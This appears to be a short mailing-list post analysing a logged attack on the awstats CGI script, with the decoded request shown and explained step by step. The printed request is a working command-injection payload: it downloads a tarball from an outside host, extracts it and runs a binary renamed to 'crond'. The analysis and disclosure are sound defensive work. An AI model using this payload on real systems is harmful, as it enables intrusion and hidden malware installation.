Replace the url-encoded characters and you get:
/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv mech crond;export PATH=;crond;echo e_exp;%00
So the attacker has tricked the script into executing a set of shell
commands, which include changing directory to /tmp, downloading a
tarball from a Romanian site, extracting that tarball and then executing
a program from the downloaded and extracted tarball, after renaming it
to "crond" in an effort to disguise it.
Damned fine research. Good job; I'm impressed.
I have reported this to awstats. Thanks for your help everybody.
-cs
